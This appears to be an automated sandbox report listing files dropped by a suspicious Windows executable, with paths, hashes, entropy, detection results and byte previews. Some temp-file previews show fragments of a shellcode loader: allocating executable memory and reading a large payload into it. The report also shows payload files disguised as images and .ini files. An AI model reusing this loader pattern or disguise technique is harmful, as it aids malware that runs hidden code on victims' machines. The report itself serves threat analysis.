Process:	C:\Users\user\Desktop\BtCQu5APhK.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11264
Entropy (8bit):	5.813979271513012
Encrypted:	false
SSDEEP:	192:eF2HS5ih/7i00dWz9T7PH6lOFcQMI5+Vw+bPFomi7dJWsP:rSUmlw9T7DmnI5+N273FP
MD5:	7399323923E3946FE9140132AC388132
SHA1:	728257D06C452449B1241769B459F091AABCFFC5
SHA-256:	5A1C20A3E2E2EB182976977669F2C5D9F3104477E98F74D69D2434E79B92FDC3
SHA-512:	D6F28BA761351F374AE007C780BE27758AEA7B9F998E2A88A542EEDE459D18700ADFFE71ABCB52B8A8C00695EFB7CCC280175B5EEB57CA9A645542EDFABB64F1
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: GuuQOl5kJR.exe, Detection: malicious, Browse Filename: Steel Sample- QUOTE.exe, Detection: malicious, Browse Filename: Steel Sample- QUOTE.exe, Detection: malicious, Browse Filename: Skambenets.exe, Detection: malicious, Browse Filename: Skambenets.exe, Detection: malicious, Browse Filename: Marcom Trade SS-04665.exe, Detection: malicious, Browse Filename: Hermaean.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.FileRepMalware.23885.29286.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.FileRepMalware.24375.4894.exe, Detection: malicious, Browse Filename: OqqrLiFWKC.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L....f.R...........!.................'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............................... ..`.rdata..C....0......."..............@..@.data...x....@.......&..............@....reloc..B....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsi97FD.tmp

Download File

Process:	C:\Users\user\Desktop\BtCQu5APhK.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	30
Entropy (8bit):	4.256564762130954
Encrypted:	false
SSDEEP:	3:DyWgLQIfLBJXmgU:mkIP25
MD5:	F15BFDEBB2DF02D02C8491BDE1B4E9BD
SHA1:	93BD46F57C3316C27CAD2605DDF81D6C0BDE9301
SHA-256:	C87F2FF45BB530577FB8856DF1760EDAF1060AE4EE2934B17FDD21B7D116F043
SHA-512:	1757ED4AE4D47D0C839511C18BE5D75796224D4A3049E2D8853650ACE2C5057C42040DE6450BF90DD4969862E9EBB420CD8A34F8DD9C970779ED2E5459E8F2F1
Malicious:	false
Preview:	user32::EnumWindows(i r1 ,i 0)

C:\Users\user\AppData\Local\Temp\nsl9337.tmp

Download File

Process:	C:\Users\user\Desktop\BtCQu5APhK.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	52
Entropy (8bit):	4.0914493934217315
Encrypted:	false
SSDEEP:	3:sBa99k1NoCFOn:KankVg
MD5:	5D04A35D3950677049C7A0CF17E37125
SHA1:	CAFDD49A953864F83D387774B39B2657A253470F
SHA-256:	A9493973DD293917F3EBB932AB255F8CAC40121707548DE100D5969956BB1266
SHA-512:	C7B1AFD95299C0712BDBC67F9D2714926D6EC9F71909AF615AFFC400D8D2216AB76F6AC35057088836435DE36E919507E1B25BE87B07C911083F964EB67E003B
Malicious:	false
Preview:	kernel32::SetFilePointer(i r5, i 1200 , i 0,i 0)i.r3

C:\Users\user\AppData\Local\Temp\nss96B4.tmp

Download File

Process:	C:\Users\user\Desktop\BtCQu5APhK.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	56
Entropy (8bit):	4.179475288865995
Encrypted:	false
SSDEEP:	3:sAAEVvjsaVBE584n:fLFVuP
MD5:	B525A5D1C0208D1745A1AB10F9BBEE5A
SHA1:	C236A0FEA985E2043789DA048DBD1787A7692E73
SHA-256:	B451DA2920871A367FE8FDFE9E2237BCB8B399389A8C467BF2948EF37089DC21
SHA-512:	891717B067AEC0532982915DB6B6C5634A204D81C2370D32BB8EC2320C32DF75F2BCA958B5346B79895637AB13F2D454F0C0FEE820CCB8C7C0B727F869507159
Malicious:	false
Preview:	kernel32::ReadFile(i r5, i r1, i 98938880,*i 0, i 0)i.r3

C:\Users\user\AppData\Local\Temp\nsw94AF.tmp

Download File

Process:	C:\Users\user\Desktop\BtCQu5APhK.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.417155962520948
Encrypted:	false
SSDEEP:	3:sEMBQEJkJVEjXcaVLMFVUxQoXUn:zaV4FmxvUn
MD5:	4C43945AF25751D98ACE9DB9E05D0EFB
SHA1:	B94B1F2D5B01AEFE74671797F02AEA92804A5AC6
SHA-256:	95830571793B3D7318EBBD38A93FE6FA4A4DB24FBE282088CC6225E47104AFA3
SHA-512:	77063395B5B87092524F390E35E3AD7BCC5D8012CA2AD5E179A9EC94395E60E626B6FFDF54F053601FD938236960D1469D905DB2E6922EED453018127D0D555F
Malicious:	false
Preview:	kernel32::VirtualAlloc(i 0,i 98938880, i 0x3000, i 0x40)p.r1

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\manxman.jpg

Download File

Process:	C:\Users\user\Desktop\BtCQu5APhK.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 100x236, components 3
Category:	dropped
Size (bytes):	6266
Entropy (8bit):	7.934604994452403
Encrypted:	false
SSDEEP:	192:LageUe3z8q30+rTymq37MvDe0QQCtvOdjxvIqwgOdTsx3W:OQeJ3trT1cMvD2jvO7vIqwgOdTaW
MD5:	D154965D450CABB2873570BBB6BCEE1F
SHA1:	B69F899F37D407E34F7391B278C08140F22A8D4F
SHA-256:	8EAF9B50CE1AE80F9A033C88D393FABFF9033E1D8485B411594889DD23AEEB48
SHA-512:	6483603905A6B6566F45C7F26EFC549D371A96DEFD57B29DD96AE8890EE481964C9E682A1077AEFC8D10F8366FADEAFE9FC0DE12477D0265C70D3BC629E53B3E
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........d.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..a..;z..6+.H.5$.o\.....h..vc.^.c..2...d..f...S....>..$..y8....<q...O:Z.,.$s..e..b.0...\.v........:.Y"9.z...9.\....aV.T....1U$..KcD.....9..G..e...........H#.?....S..+..hW..x.......1.T...6s.....;h.ym ..4*..2E..V2I=...7w.t,UD...Z.9..V<.$.=j.d...zc.J........x.J.4y ....X.A...PH.~S.Kn.I...1;....pOJEr$a.r8.......4.D...s..ZRf.b..$...O\|..3ax..WE;..?Z....<t8....

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\modstaaet.jpg

Download File

Process:	C:\Users\user\Desktop\BtCQu5APhK.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 564x766, components 3
Category:	dropped
Size (bytes):	77820
Entropy (8bit):	7.966308391338044
Encrypted:	false
SSDEEP:	1536:0aI5v5+r/WGPIAVQIhrVMZXPizutOFGlin5ZSk2iFJNfgJSYrLfEXWMz:I55e/pVQIhrqKusGkmkPnNYhX2r
MD5:	69FAD6C6022F82800FD9AA55EAFF43DF
SHA1:	C34951D82990B356BCB2CAE1B24690AAA9A558AB
SHA-256:	D765417E77F1604852B08BF8E3FC78B08DB3947AE0456B7DA5A7E272D83B1426
SHA-512:	324D713ECDE5AAFCEE49721D65936E3B8646F482521D971059E4D90908EAAA0CD7F0FE47159529935C3589F5892AB9F930AE74630EDBECC81CC68B7FC5FBA227
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........4.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..lY.C.v.J.).6...{S.)+.k......%.3..=k@J#.+29Da@.J..c.YJ.n...3....E;.P...v...{..&nJBO.......'......<.cT.j..[....q.d.....8<...)...Y..d.c.......tV7....\..X.;..x.kG(<W....:.4.H.[..$\|r{T7..9W=..h.=+[{....+. .F8.>&_.....z.....T!tL.f<.3..4..$.5.,....N.vr7...+.......sZp.#..Y.....O.;..r.gTc..E.k.{u5.....U....E:.5p.z..j.O"3....*..f..+.d.3U..u<qE:.;..$.X.....D.....M

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\musicianer.spi

Download File

Process:	C:\Users\user\Desktop\BtCQu5APhK.exe
File Type:	data
Category:	dropped
Size (bytes):	252988
Entropy (8bit):	1.258435768634305
Encrypted:	false
SSDEEP:	1536:Ffup5V9mQ4FqyWKrbCGsV2kLUY+mvKDFHHe4w/Lm65l32C+8zQNrpQJu0jx23uf5:1lMpKEfpd
MD5:	E19F0FF07EFE63E8B30B92E64C3279C1
SHA1:	7855F6FBD8FC96F485B4140A85A4D5CBD31F1AF9
SHA-256:	4CE892AA1B8B8CFFC9835C703FABC69087F82490FB46E889D6C07280DCE64E03
SHA-512:	030264903EFB58841058997648E112F3AC89EE4D9EA038D96F1CD132A59B2B0A3D6BCB4DD99DA62279835408453F84CF3AF492E1D53910C8AE29CCE386E2D5CB
Malicious:	false
Preview:	......................g........................P.......<.%}...........s...................Y.........M........................D.......................R...............................^............................................................................\.......................................................................................i........}.....j............%...........................................d.................._..............................Q..........................................@..............................................o...................;.....?..........g.......................................................................................................................................X.................`.....%..............[.....Q..........2.`.................................."L................................v................(..............-...................................................................".......................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\ndder.jpg

Download File

Process:	C:\Users\user\Desktop\BtCQu5APhK.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 253x460, components 3
Category:	dropped
Size (bytes):	9249
Entropy (8bit):	7.859769804343658
Encrypted:	false
SSDEEP:	192:Lg3GVbPdwh/TkYJFxFd5Ynr9rwP8eiJnuLq6dIUfvF3g5/S+4DHEk:k3GVbPdSwYJn5Yr9rNJuLq6d1nF6S+4F
MD5:	99568CF7EA7AB982BEBEC6E8C9736699
SHA1:	656B55183279F357ABE336F6359C4AEDB5FB4AD6
SHA-256:	B9FCD205A8B2A819D6774B0F217334C24E508A02BA504D24CE3438C17AAE630A
SHA-512:	C7408A24197C4BF2B14C3AD43840851EB14325E60490998E1625FEC3CE538CB8B4EC1C9A71836990E0EB4EE922040217EC0989FD6E6D4F5BC4FCC3F3FDA0FB10
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..JZJ.JZJ(.h...QE%- .(...-.P..E%-&..i..i..J(....Q@.KHh......BR.JQ@.V..E......%8.h...i.2..4......K@.KE..R.R....Q@..QHh.E- .4.Zi.f.i......(4Q@..)i(...JZ.)E%(.@.-IQ.Z......{S(...N.....%.S...Z(...(..............Q@..Q@.%-%..(....(4.JJZJ....P..AK@.Z.TKR..1..GR5Fz.4....z.1.RR........(...ZJ(.h..@-....);.J.(...-%-%.-..C@.4.)(..ZJZ.QKM...$.".B.Z.b.J...Fh.S.Z.ja.h....e.E.P.E.P

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\romantiserendes.ini

Download File

Process:	C:\Users\user\Desktop\BtCQu5APhK.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 564x766, components 3
Category:	dropped
Size (bytes):	79085
Entropy (8bit):	7.963718594699245
Encrypted:	false
SSDEEP:	1536:0aI5v5+r/WGPIAVQIhrVMZXPizutOFGlin5ZSk2iFJNfgJSYrLfEXWMn:I55e/pVQIhrqKusGkmkPnNYhX2P
MD5:	48951E338D32805997DA47E7122CA34C
SHA1:	FB7A57BEAAC5B15E081DCF5A54947107FB9DF9C0
SHA-256:	62D4D8C14C5BC21B8FC7BAC1BC1C8A272404C5516871E574D9E65EEF00787D11
SHA-512:	7BC3831B4274EB53F5F40C59C41456C35005FEFDD486774DA41287EA46CC33E2858C0DAE2BBE9FD12EB63BD7BA8460D8B184AB316340B45E90C939821B92D2E7
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........4.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..lY.C.v.J.).6...{S.)+.k......%.3..=k@J#.+29Da@.J..c.YJ.n...3....E;.P...v...{..&nJBO.......'......<.cT.j..[....q.d.....8<...)...Y..d.c.......tV7....\..X.;..x.kG(<W....:.4.H.[..$\|r{T7..9W=..h.=+[{....+. .F8.>&_.....z.....T!tL.f<.3..4..$.5.,....N.vr7...+.......sZp.#..Y.....O.;..r.gTc..E.k.{u5.....U....E:.5p.z..j.O"3....*..f..+.d.3U..u<qE:.;..$.X.....D.....M

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\semiquadrangle.ini

Download File

Process:	C:\Users\user\Desktop\BtCQu5APhK.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 660x206, components 3
Category:	dropped
Size (bytes):	18366
Entropy (8bit):	7.960531856269744
Encrypted:	false
SSDEEP:	384:G69R2kiP8DN7z8OayzjwTSQ1vI8+KvvKyMIWVx3NRGBQqxFk8nWzy1+a6Pu10IJ0:GgHpXda7+2d1vezVx3NRCpnZ1+afGIJ0
MD5:	D0B061FE143A45224AF28C219D85EC29
SHA1:	98EC46FB584AFFF14AB2B9D8DBD914C2F82DB58B
SHA-256:	DDD6D841667588C40373273F4ACE25CD8E25C527BC4B15160A4BD95D5F5F859A
SHA-512:	D6035392C1E6D28B01CF4AD9025E9E43B64CAAD772B6FBF2F0D239CDC5F2B1DB3266DEAC88DC73B3C443D8755582E9E99B86642BE67E693447B5B70E79116A48
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...1N.......N./..+..&c.8."......4.Gj..L..:...^...S......".)h..V.@..1..pi.....Z...V%.t..X...#...M6..SwsY......I.z..P.@....c....i.......J..}.t...t....4..A...\|....U:.~....)......[Q.f.....K.<.0.9.D.8..<.1.G...sG$..29E.(..b.h..V.....G....N6/.F8aV.f.!{..g..c_.I.q.b.c uQ.,D.@9..~8.~...{.j.....`....`vt.j.%.G.........*.... .y.u.."....SNU<(.TIuNqm.aA.......+...

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\sugarcane.jpg

Download File

Process:	C:\Users\user\Desktop\BtCQu5APhK.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 660x206, components 3
Category:	dropped
Size (bytes):	17926
Entropy (8bit):	7.964086895083405
Encrypted:	false
SSDEEP:	384:G69R2kiP8DN7z8OayzjwTSQ1vI8+KvvKyMIWVx3NRGBQqxFk8nWzy1+a6Pu10IJy:GgHpXda7+2d1vezVx3NRCpnZ1+afGIJy
MD5:	226BA095D6E35AE7575FF844DA0C0293
SHA1:	D50131B137CAA1464076A0F6B1AB1ADA6E99234E
SHA-256:	307B12DABB919A69383409A5064E70DCD0CD4903C9E94814D10C540312F0BE73
SHA-512:	3BEC4961D0682F6ECA723A8838DB446F5152C34D82B9EEE7CE2B80724F63BAB6D4A3BE0C0B5418E7831F04AD8236697B7E4820ECE601878471AAA2184488121A
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...1N.......N./..+..&c.8."......4.Gj..L..:...^...S......".)h..V.@..1..pi.....Z...V%.t..X...#...M6..SwsY......I.z..P.@....c....i.......J..}.t...t....4..A...\|....U:.~....)......[Q.f.....K.<.0.9.D.8..<.1.G...sG$..29E.(..b.h..V.....G....N6/.F8aV.f.!{..g..c_.I.q.b.c uQ.,D.@9..~8.~...{.j.....`....`vt.j.%.G.........*.... .y.u.."....SNU<(.TIuNqm.aA.......+...

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\tinkle.jpg

Download File

Process:	C:\Users\user\Desktop\BtCQu5APhK.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 670x109, components 3
Category:	dropped
Size (bytes):	10701
Entropy (8bit):	7.839639743360956
Encrypted:	false
SSDEEP:	192:Lzr3FqEXWDs3kosNACUJ2PDTHjHzCM4guHBTGgAuihMBvUjhIaRTHO:3r3FqCd3Bsy1IPDTDebgkTG1XNHO
MD5:	6AB549CF24DE4802D3806218FDC48906
SHA1:	DADA9FCA4EC7121494CC70B3E7A2018E0F8116CA
SHA-256:	D484ED1BD415EC1F924CA80A2B8EBD60FF02998A3AD3028145C75900F51F19DF
SHA-512:	FDB7BD49B53E243FBDD3FF6613BDC0F47E6ACBE378EC9599263393B121395DCA0B23D978B7029F058B5AEBE4264EB356C945C0EB1AB00B3D6A3E75EE6D4D8651
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......m...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..vQ.......Olf.6.Q....z~.....?:6.j.....m.E..F.q..........q.?:.....q.)v...qK.."...(......J.....[.G.G....t.1@....I.../.N.....{..K..U......$....G...~b..0(..S.....B..#...T..b.........W.K..F(..X..~ty_..N...........Y..~t.Q@.....O..3}.~&......>...5*...H...(.....~t.3....qF(.l..i.:6...b.........xS....h..h...6..-&.....-........`.....bm.......Rb...uqL.........c.....h

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\unagitatedness.txt

Download File

Process:	C:\Users\user\Desktop\BtCQu5APhK.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	355
Entropy (8bit):	4.365173801202148
Encrypted:	false
SSDEEP:	6:a33GWsurYzIbhGvPiUWrFArTWzgVJ86CcE6LpA6rMrLGbGVPoHknd3TFKA8iWFzK:amN9C0vPQqrqsj86Cck6kVPoEnFweWKp
MD5:	52728264A79BB126BC05A9339A806437
SHA1:	031F624DC90E451583A740F03B0432F63FB472DE
SHA-256:	8D23AFDA0BB6BFD4399AF4AEBFAA8196644DCD468D1E6705C2388E7DB49F8D4A
SHA-512:	EFC41C3E278119CFEDBC039153FE6374C5DB4DBD95E10969768115EFA463D9E38CBC0C3DC2469D200C775AF7851E4B77AB4AE63B5456E4DE996EB21A94903519
Malicious:	false
Preview:	Vekselrytterne kolostomi skamskndede ufortrdent stableman unisolate fancical..[shrouds brasekartoffels]......aftagere afterband rituel.Limiterede corregidors vgtningen debouches caribed entopic bankkredit dopey hjemfrsel..;karaktertrkkene venulose snadret angelikas heroizing nitrosyls.Remonteres interesseomraader moslings propolsserne dilution refulge..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\vrfterne\Litiscontest.jpg

Download File

Process:	C:\Users\user\Desktop\BtCQu5APhK.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 607x510, components 3
Category:	dropped
Size (bytes):	116646
Entropy (8bit):	7.9723106052665536
Encrypted:	false
SSDEEP:	3072:Cq3EK4+CecuNPZ23e6at5JG7QXnv0tD6nI:Cq3PRCeTZ1tspwI
MD5:	2400D62D49391C7874C3DF868B3399ED
SHA1:	F5AF15AAE9EE9BD00F459D67EBBCDB8E48B6D4A3
SHA-256:	C400565DCC08D080953E47902F2946C687C4F814C3BA51E0D4E63E4242112566
SHA-512:	7CE7C0DAA1B222DD67D6292F9FE3A9BDFB0782C790D817C0B4B348B8D8AB7B5630D8DBFB953ED55093DFB2DCABF8FBB257A4ED666B2145D8946E0D2C082DB70B
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........_.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...gG..(..;..n.%`...2w.~.V.5...D...U........$..r\|.>....Y=..c8...Ae...V.....i..H.....Z....7b.1.........mm...F.A...A.....L..'m......[f.U.n.......jZ.p.....-..A.'....R.1TP....=*K(.x..r..[....I..z".[...#..[qV.d....oh:].nd.XY...H....s.L ......K. .;.3..-...9dR.@7..V.\|}...\|..Sk.c..eP..r.(.....C.V..6.^.4.S..[...}.i.nd.....R....=O.>.n^1.A$..P7.'.?QY...I]..........B.X

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\vrfterne\Nontranscribing.Afk

Download File

Process:	C:\Users\user\Desktop\BtCQu5APhK.exe
File Type:	data
Category:	dropped
Size (bytes):	464370
Entropy (8bit):	7.128664105126662
Encrypted:	false
SSDEEP:	12288:tcN8s2ALwBV6bJhSXw1Yg9Zgvl1J8nyXW:W53wBV6bWwPivjJJXW
MD5:	7E9CCC8B5A47A5A19342C11804D3A945
SHA1:	DC9C2F550A59FB4837432F67800F223BEE356B07
SHA-256:	54211487EF40979F6A0F0867799C60235277EA393976411BB979B2441B80A272
SHA-512:	5E085423CE6EDEE16EDC188EC1C3B9B7B70CF7B307155E2627FE1B9C2858B23D129F939390F75F3489CE02CD7AB3A6D8939ED5A1D1B124FFA75256D651F15EE8
Malicious:	false
Preview:	.......ZZZZZ..................&.U......O.==.....R....A.,.%%%............hh.........VVVVVV....................\\.....P......0.EEE..``.....i....................c....??.........@.........!!!.............`........LL.............???..HHHH.....ww.............d............................Y..........d.............C........................+++..LLLL....JJJ.......Q...y..]]].............................y.....................fff.1..G...`.n........~........&.........../...55.J...............2............_.......................aaaaaaa...]]]]..............l............u....$$$$$.........88888............=............::.Q........................m....ll.....I.B..............}..................................nn.(.........#...LLLL....X............E..H..................Y...................L.NNNNN...mm..++.........K................t..............""..;..................s..gg...Y..c.K.................................t........................YYYY.............$......(.^^.........3...;;.5....777..........j....

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\vrfterne\Sproglyde.Mes

Download File

Process:	C:\Users\user\Desktop\BtCQu5APhK.exe
File Type:	data
Category:	dropped
Size (bytes):	53339
Entropy (8bit):	4.586909533694526
Encrypted:	false
SSDEEP:	768:2klatJBusrGW4a5kIO4/ZV6/Wb9DcGfVupUahJTIuJVDbVuULJfpanV5Sd:2kotJEnckIdZ4O4UCIgl1nXd
MD5:	6217DB8D3167C8D33F7FF0C9C3DBA09F
SHA1:	516815348D5A41023E7BFA63ACD582C5E2C4BFDA
SHA-256:	2151BFBD84CAF4F46A4E934AFEE7CD933516CD8DECE6BF869277ADCAA06A9DBA
SHA-512:	2413ED09DD4C626ADA07E21A160A46BB80F9603A0464A0298A9A770A51FF14EB648AB7C23AAC24F0C9745044B57A1B35B815E3BFB311F1C5EFB1874FE6FFFECF
Malicious:	false
Preview:	.................................&&&..QQ.33..]........h.......C.."........c.....;.....TT.............uuu.......kkk................ZZ.......kk.......qqq.>>.......j..e................."..........q..K....uu....+.......<<....111......"...h..........'..........}}.@.GGGGG.Q..................ss........FF................=....Q..8.......11....c.......C......Z.n..........(...Z..6..........////..$$$$$.a.....................................((..n....RR...........................PP......i.b................#.....ddd.....::.ZZZZZ....................oooo...........$.......~.'........-..-......3.z...Z...d.'......9.777.....................!....W.....................................................MM......."......W....ffff..........HH...zz....................\.-......9.....:....e.--...jjjj............}.........h....#.....CC.......8..SSSS...H..................7..==..............!..%%.V....<<............II.6..............................f..........Q.3...............................K.........................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\vrfterne\Tiggerstavens.fes

Download File

Process:	C:\Users\user\Desktop\BtCQu5APhK.exe
File Type:	huf output
Category:	dropped
Size (bytes):	458176
Entropy (8bit):	1.246204574944222
Encrypted:	false
SSDEEP:	1536:xRWO2EIpW61fXKYiZAiYUQZF4Ce2spug3ZcCQy0kTwxdwBl9qiJsuQKSA4o6LOzv:seFwClmyQzweu
MD5:	F507FD73B5683DFB9ECE04A486CF8E21
SHA1:	171A7FF1F5C92A75FF2787021BA6750FEF68213F
SHA-256:	9AEAFCD46AA3D1B660FB1A3A8F10C21D28C80A50BF37A23D9ECA444A51557065
SHA-512:	B6124C979EF1DC6946F95EACAA369E4EABB9B0E32781197A8A2686FA2FEDB69B123B274EB19E82E4AD781FB49D6F74A96E1B38C147C7AC163C5430DD084C7D2F
Malicious:	false
Preview:	....................................................................................................<....................q.......................u....c............................................................C.....k..................................#..............P......k............N...............I.................................................S!...........................................................Z...........u.................m...........................................................................)..............................................................................8..................................................................p............................D....u........................................G...............[...$.......~............E............t...........1u...........................................................................................................].............................4.....................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\vrfterne\Udgyd.ini

Download File

Process:	C:\Users\user\Desktop\BtCQu5APhK.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 666x357, components 3
Category:	dropped
Size (bytes):	34271
Entropy (8bit):	7.9659073424878555
Encrypted:	false
SSDEEP:	768:4WE6omjLoyBWuDNGNceCXyQezdhoMB8q+ljUsYU1xhbU3vCH:4Uom4yBhmQi7eK8q+lpJRUfCH
MD5:	868F1BE25FA5F82DE53C0CE9EA030CA3
SHA1:	ECA9A135448D5C0F613209FF3516CAE3716BF0E3
SHA-256:	5FD97F664356EE61E6182C19DC0AF76318B4AA9AF75D674F11EB45DEF3D66526
SHA-512:	6A67BE639F4A4A8A24587ED6B1D67F276F41BC750B0FC74C49A69FF9293F57ACAE6DEF3423C8DF06805A1BB7CE894F4359510B3A27E2E1F388D065A618479E21
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......e...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..j\R.zq]G(...z......Hi.."..E.....G.J..P..)..P.h&..L{P..r..I.;RP .R.\.]....Fh..P..b....8b...A=...4..E...\P)(.v4..4dsI.h..-..R..q.))....M..i...(.A.P.b.)2(......)E....{.G4...(.`..SE:.0..R.@...9F.-...)z.GJ^.....Z..h.4.h.i(...(....../Z)q@...ZZ^....ZP3...-.{..Z.3G..P!..:../.0.y..K.ZhCE....Z.%...E.7.`R...r>..LQ..6......j..?......&)6..O.=.q..4.1..zPE. ZO.Gj.7.Q.u.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\vrfterne\Udtrttede.ini

Download File

Process:	C:\Users\user\Desktop\BtCQu5APhK.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 564x766, components 3
Category:	dropped
Size (bytes):	78838
Entropy (8bit):	7.9645085314331405
Encrypted:	false
SSDEEP:	1536:0aI5v5+r/WGPIAVQIhrVMZXPizutOFGlin5ZSk2iFJNfgJSYrLfEXWMp:I55e/pVQIhrqKusGkmkPnNYhX2R
MD5:	C994CB2032DBA92B7E631171678EC43D
SHA1:	E206DF32EA7F37FA26075E0456786E138AC27AE1
SHA-256:	3D6B9E81DA6DF4A9432CDB4168EE8F8B26CC88E47FDB9BB8A6D967FB1AB241E3
SHA-512:	E444152150B4C1007FA96AA079E41D959A5A48D00D9F1D9AC15321B646F7CF4000D43825DF25EF7D69275A3CA86C029E8862AF07F873A8375B1EAAE5280A4F13
Malicious:	false
